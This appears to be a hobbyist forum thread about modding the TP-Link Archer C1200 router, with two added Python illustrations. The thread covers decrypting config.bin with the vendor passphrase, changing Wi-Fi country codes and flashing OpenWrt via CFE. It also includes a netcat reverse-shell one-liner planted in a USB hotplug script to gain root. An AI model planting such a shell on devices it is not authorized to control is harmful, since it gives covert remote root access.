Build for TP-Link Archer C1200-AC1200

I'm sorry, it's not like that. The scripts will load the config from the files in /etc/ where uci stores the data.

You just need to edit /etc/config/wireless (if you downloaded the GPL source just take a look at ./IPlatform/platform/ibase/luci/src/contrib/uci/hostfiles/etc/config/wireless for an example).

To do so, simply add the values in XML format in your config file.

Now, I agree that then you potentially lose the ability to manipulate this from the web interface. It depends what you want to do.

I see....pardon my ignorance....still new to learning this stuff. :zipper_mouth_face:

Anyway, I tried to edit config.bin and add channel 165 (currently using official EU firmware), however I am sad to say it didn't work. It rebooted and automatically selected channel 48. (Android Wifi Analyser also indicates channel 48 being used)

Hmm....turning txbf on for 2.4ghz in config.bin doesn't seem to do anything (no dbm improvement when streaming video to my phone and laptop) unlike 5ghz (GUI available for 5ghz only)

As far as I know the hw has no bf capabilities on the 2.4 GHz spectrum. Regarding the channel there are other config options and files at play and you can use various tricks to set it, but you'd need to be creative about it.

I suggest you study how the various files work to bring up the wireless interface (e.g. tplink_brcm.sh) in the original firmware. I can't give you a pre-made solution because I don't have one. :slight_smile:

Good luck!

When I try to decrypt the config.bin I renamed from backup-Archer C1200-2018-01-03.bin, I got the error below, am I doing anything wrong? Running Ubuntu 16.04 on VMWare with my own compiled openssl including zlib from this guide:

Running the command:

openssl zlib -d -in config.bin | openssl aes-256-cbc -d -k ‘Archer C1200’ -out config.tar

I get the error below:

892:error:29065064:lib(41):BIO_ZLIB_READ:zlib inflate error:c_zlib.c:548:zlib error:data error
error reading input file

.....Did you configure your openssl with.....

./config --prefix=/usr \
  --openssldir=/etc/ssl \
  --libdir=lib \
  shared \
  zlib-dynamic &&
sudo make install

....after you ....

$ ./config zlib
$ make
$ sudo make install

...?

Note: beware of the apostrophe symbol for 'Archer C1200' if you copy paste the command from this forum. For some unknown reason, the apostrophe changes to another symbol after one copied/pastes from this forum. Better retype the apostrophe symbol.

Thanks for your reply.

I have tried running the command below:

$ ./config --prefix=/usr --openssldir=/etc/ssl --libdir=lib shared zlib-dynamic && sudo make install

after running

$ ./config zlib
$ make
$ sudo make install

but I still get the same error. I also tried reversing the commands as suggested by another user above and I got an error saying bad decrypt and also the data error as before. Any ideas on what I should check next?

EDIT: I got it working on Windows by running the AES decryption first and output the file, and then using zlib to decompress the output file again. Thanks for helping out anyway.

EDIT 2: Strange enough, I wasn't able to get the file to be verified from TP-Link's web GUI even though I ran the same commands as you to encrypt the file back.

openssl zlib -in config.tar | openssl aes-256-cbc -out config.bin -k ‘Archer C1200’

EDIT 3: I got the bad encrypt error again on Ubuntu or Debian but not on Windows. Perhaps this is related to the issue that I'm unable to encrypt the file back?

I am using virtualbox (ubuntu gotten from ^osboxes.org^, login pass is ^osboxes.org^).

First, I open the Terminal,

sudo apt-get install gcc make build-essential

wget https**://zlib.net/zlib-1.2.11.tar.gz (err, cause I am new user, I can't post more than 2 links, I assume you know how to remove the ** )
tar xvzf zlib-1.2.11.tar.gz
cd zlib-1.2.11
./configure
sudo make install

cd ..
wget https://www.openssl.org/source/openssl-1.1.1-pre2.tar.gz
tar xvzf openssl-1.1.1-pre2.tar.gz
cd openssl-1.1.1-pre2

./config --prefix=/usr \
  --openssldir=/etc/ssl \
  --libdir=lib \
  shared \
  zlib-dynamic &&
make

sudo make install

Next, time to uncompress/decrypt:

openssl aes-256-cbc -d -in config.bin -k 'Archer C1200' | openssl zlib -d -out config.tar
Whatever you do, don't copy paste from this forum. The apostrophe symbol issue is pain in ass


See the issue? The first one has wrong apostrophe (if one copy-paste from the forum). The second bottom line has correct apostrophe.

tar xf config.tar

Well....edit the stuff extracted from config.tar....edit ori-backup-user-config.bin to your liking.

Then open up the config.tar , delete the ori-backup-user-config.bin, drag and drop your edited ori-backup-user-config.bin into config.tar

Time to repack/reencrypt again

openssl zlib -in config.tar | openssl aes-256-cbc -out config.bin -k 'Archer C1200'

Careful on the apostrophe

1 Like

Thanks for your guide, finally managed to get my SSH working but I used OpenSSL 1.0.2m instead of 1.1.1-pre2, guess the engineers encrypted V1 with a different version instead.

BTW, do u happen to be a Malaysian too by any chance?
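
An added example, not part of any post in this thread: the "data error" and "bad decrypt" messages above can be told apart by looking at the first bytes of config.bin and at how `openssl enc -k` turns the passphrase into a key. The default digest for that derivation was MD5 up to OpenSSL 1.0.2 and is SHA-256 from 1.1.0 (selectable with `-md`), which is one reason the same command can fail on one build and work on another. The function names and the sample bytes are constructed for illustration.

```python
import hashlib

MAGIC = b"Salted__"  # header `openssl enc` writes when given a passphrase (-k)
TYPOGRAPHIC_QUOTES = "\u2018\u2019\u201c\u201d"  # what a web page may turn ' and " into

def outer_layer(blob: bytes) -> str:
    """Identify the outermost layer so the pipe order can be chosen."""
    if blob[:8] == MAGIC:
        return "openssl-enc"  # decrypt first, then inflate
    # RFC 1950: low nibble of byte 0 is 8 (deflate) and the first two bytes,
    # read as a big-endian number, are a multiple of 31.
    if len(blob) >= 2 and blob[0] & 0x0F == 8 and int.from_bytes(blob[:2], "big") % 31 == 0:
        return "zlib"  # inflate first, then decrypt
    return "unknown"

def check_passphrase(passphrase: str) -> bytes:
    """Refuse a passphrase that still carries pasted typographic quotes."""
    if any(ch in TYPOGRAPHIC_QUOTES for ch in passphrase):
        raise ValueError("passphrase contains typographic quotes; retype it")
    return passphrase.encode()

def evp_bytes_to_key(passphrase: bytes, salt: bytes, md: str, key_len: int = 32, iv_len: int = 16):
    """One-iteration EVP_BytesToKey, used by `openssl enc -k` without -pbkdf2."""
    material, block = b"", b""
    while len(material) < key_len + iv_len:
        block = hashlib.new(md, block + passphrase + salt).digest()
        material += block
    return material[:key_len], material[key_len:key_len + iv_len]

def candidate_keys(blob: bytes, passphrase: str) -> dict:
    """Derive the AES-256-CBC key and IV under both default digests."""
    if outer_layer(blob) != "openssl-enc":
        raise ValueError("no Salted__ header: not the output of `openssl enc -k`")
    salt = blob[8:16]
    pw = check_passphrase(passphrase)
    return {md: evp_bytes_to_key(pw, salt, md) for md in ("md5", "sha256")}

# Constructed sample: header, an 8-byte salt, 32 filler bytes standing in for ciphertext.
SAMPLE = MAGIC + bytes(range(8)) + bytes(32)

if __name__ == "__main__":
    for md, (key, iv) in candidate_keys(SAMPLE, "Archer C1200").items():
        print(f"-md {md:6}  key={key.hex()}  iv={iv.hex()}")
```

If `outer_layer` reports `openssl-enc` and decryption still fails with a correctly typed passphrase, retrying with the other `-md` value is the next thing to check.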

Yes. But that is irrelevant.
Even with ssh access, there is nothing much we can do without root access.

root access can be achieved by getting a service or event to execute a shell and pipe it over netcat to a computer.

I used /etc/hotplug.d/usb/10-usb and then plugged in a usb stick to force the event.

on the computer I executed:

nc -l -p 12345

in the 10-usb file I added:

mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.1 12345 > /tmp/f

I'm going to look into persisting changes on boot by using the overlay

@quaqo probably has a better way.

3 Likes
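
An added example, not part of the post above: when auditing a router afterwards, an edit like the one described leaves a recognisable line in the hotplug script. This sketch flags script lines that join a shell to a network client; the function names, the tool lists and the sample file (which reuses the line quoted in the post) are constructed for illustration.

```python
import os
import re
import shlex

SHELLS = {"sh", "ash", "bash"}
NET_CLIENTS = {"nc", "netcat", "ncat", "telnet", "socat"}

def commands(line: str):
    """Split one script line into argv lists at ; && || and |.
    Heuristic: separators inside quoted strings are split as well."""
    result = []
    if line.lstrip().startswith("#"):      # shebang or comment line
        return result
    for part in re.split(r"\|\||&&|[;|]", line):
        try:
            argv = shlex.split(part, comments=True)
        except ValueError:                 # unbalanced quotes after the naive split
            argv = part.split()
        if argv:
            result.append(argv)
    return result

def audit_script(text: str):
    """Return (line_number, reason) for lines that join a shell to a network client."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        names = {os.path.basename(argv[0]) for argv in commands(line)}
        shells, clients = names & SHELLS, names & NET_CLIENTS
        if shells and clients:
            reason = f"{sorted(shells)[0]} wired to {sorted(clients)[0]}"
            if "mkfifo" in names:
                reason += " through a named pipe"
            findings.append((number, reason))
    return findings

# Constructed sample of /etc/hotplug.d/usb/10-usb; line 4 is the line from the post.
SAMPLE_10_USB = r'''#!/bin/sh
# constructed sample, not the vendor's file
[ "$ACTION" = "add" ] && logger "usb device added"
mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.1 12345 > /tmp/f
'''

if __name__ == "__main__":
    for number, reason in audit_script(SAMPLE_10_USB):
        print(f"10-usb:{number}: {reason}")
```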

In conjunction with root access method given by @drush , I am able to determine wifi capability without going through all the way of backup,decrypt,untar,edit,encrypt,restore steps.

Apparently, different country code has different 5ghz channel available. When I changed the code to MY and edited channel to 120, 136, 165, it ended up in failure because Broadcom wifi firmware country code does not allow such channel to be valid.

It turns out Malaysia country code in broadcom firmware only contains channel 36, 38, 40, 44, 48, 149, 153, 157 and 161.

Strangely enough, if Bahamas BS code is specified, the router will end up not being able to restore the edited.bin settings

edit: anyone wanna prepare a list of country code available with 5ghz channel from this c1200 wifi firmware? I wonder which country code has the most 5ghz wifi channel......

mine has only 36, 38, 40, 44, 48 eu firmware.. would be great if there was a way to use other channels.

Please do the following on CABLE, not wireless

  1. Please make a backup of config.bin (unmolested, clean and virgin)

Must use root mode. Follow @drush guide.
As admin mode ssh admin@192.168.x.x in ssh access, edit /etc/hotplug.d/usb/10-usb via VIM (vim keyboard shortcut a pain in ass) to add mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.x.x 12345 > /tmp/f at the bottom and save it. Don't ask me how to use VIM, I have hard time myself.
Change 192.168.x.x to the IP address of your linux system

In my case, I decided to use Rufus + Ubuntu live cd.

Using sudo -i to enter root mode at ubuntu before running nc -l -p 12345
Plug in a usb pendrive to the router and voila, ubuntu terminal will get connected to the router.

uci show wireless
uci set wireless.eth2.country=MY
uci set wireless.eth3.country=MY
uci set wireless.eth2.channel=auto --->for a good reason, you can change it later.
uci commit wireless; wifi ----> this will reload the wifi interface.

EDIT: I forgot to mention the most important part. Need to restart uhttpd server before the following step of uploading a modified config.bin:
/etc/init.d/uhttpd restart
***Otherwise, TP-Link webui will reject the modified config.bin in the following step below.

Now, the pain in ass issue, remember the previous ori-backup-user-config.bin from few posts ago? Yeah.....one needs to edit that as well ;
<country>MY</country> ---> for both 2.4ghz and 5ghz
Set <channel>auto</channel> for 5ghz
Re-tar,recompress,re-encrypt.

Open up tplink 192.168.0.1, and restore the edited config.bin

voila, EU firmware get persisted MY channel 36, 38, 40, 44, 48, 149, 153, 157 and 161

Otherwise, if one simply edits config.bin's ori-backup-user-config.bin country code and 'restore' it, it will not get 'activated' after 'restore'. The uci commit step must be done first.

1 Like

Can anyone help me to find out what is written into config.bin when webui is sending {"value": "AR", "name": "ARGENTINA", "no_autodetect": true}
This "no_autodetect": true probably disables DFS or TPC or both.

Example, TM Malaysia C1200 firmware can support channel 36, 40, 44, 48, 100, 120, 161, 165 using BS country code.

However, in EU C1200 firmware, simply changing to BS country code will display 36, 40, 44, 48 only. Directly changing to MY country code will display 36, 38, 40, 44, 48, 149, 153, 157 and 161. So, I suspect my EU firmware config.bin is missing critical parameter in enabling missing 5ghz band 2A and 2C

Another strange issue, changing the code to TW causes 2.4ghz wifi to stop functioning (in the config.bin, channel 1 is selected for 2.4ghz interface). TW 5ghz will automatically pick one of band 2A channel and function normally.

Hi, I have the v2 (EU) of the Archer C1200. It appears to be rather similar to v1, according to wikidev it uses the BCM47189 instead of the BCM47189B0.

I have access to the serial console and would like to try how far I get with the build for v1.
But before I do that, what's the recovery procedure?

Can I flash back the factory image using CFE?

I've tried TFTP loading the initramfs on v2, but it would not boot.

CFE> boot -tftp 192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx Options:(null)
Loading: ........... 262144 bytes read
Entry at 0x20000000
Closing network.
Starting program at 0x20000000

It also gets stuck there if I try build_dir/target-arm_cortex-a9_musl_eabi/linux-bcm53xx/vmlinux-initramfs

CFE> boot -tftp 192.168.9.133:vmlinux-initramfs
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:vmlinux-initramfs Options:(null)
Loading: ........... 262144 bytes read
Entry at 0x20000000
Closing network.
Starting program at 0x20000000

I'm wondering why it's only reading 256kB when the files are in fact much larger.

Never managed to figure out boot command, seems broken to me/looking in bad direction.
I'm testing my fw by using: flash -noheader ipaddr:filename flash0.trx
that flashes the file without checking.
For going back to stock, just restart modem and spam reboot button until firmware recovery starts, then upload original firmware

What is flash0.trx? Is it a renamed file generated by the OpenWRT image builder?

That's where firmware partition starts

Ah, didn't see the ipaddr:filename in front of it.

I guess you are flashing the squashfs.bin file?

btw, I managed to get the boot / load command to load the entire file by also specifying the address:

CFE> load -addr=0x20000000 -max=3428352 -tftp 192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx 
Options:(null)
Loading: ........... 3428352 bytes read
Entry at 0x20000000
*** command status = 0

However, it would still not boot.

CFE> go
Closing network.
Starting program at 0x20000000

edit: Thinking about it, it makes sense as the initramfs will probably load data to that region of memory too, and in doing so overwrite itself.

So I've flashed your archer-c1200-v1-initramfs.trx to the flash of my v2 router and it boots!
dmesg

Ethernet is working, USB is working but for WiFi only scanning the 2.4GHz band works, neither sta nor ap mode result in a link, but you had the same problem. Also the polarity of the LEDs appears to be reversed. (Writing 0 to brightness turns them on, 255 turns them off)

I've also successfully flashed the factory firmware using the CFE web based recovery. (The http server will only listen on 192.168.0.1, so I couldn't access it after changing the ip with ifconfig)
dmesg of the factory firmware

1 Like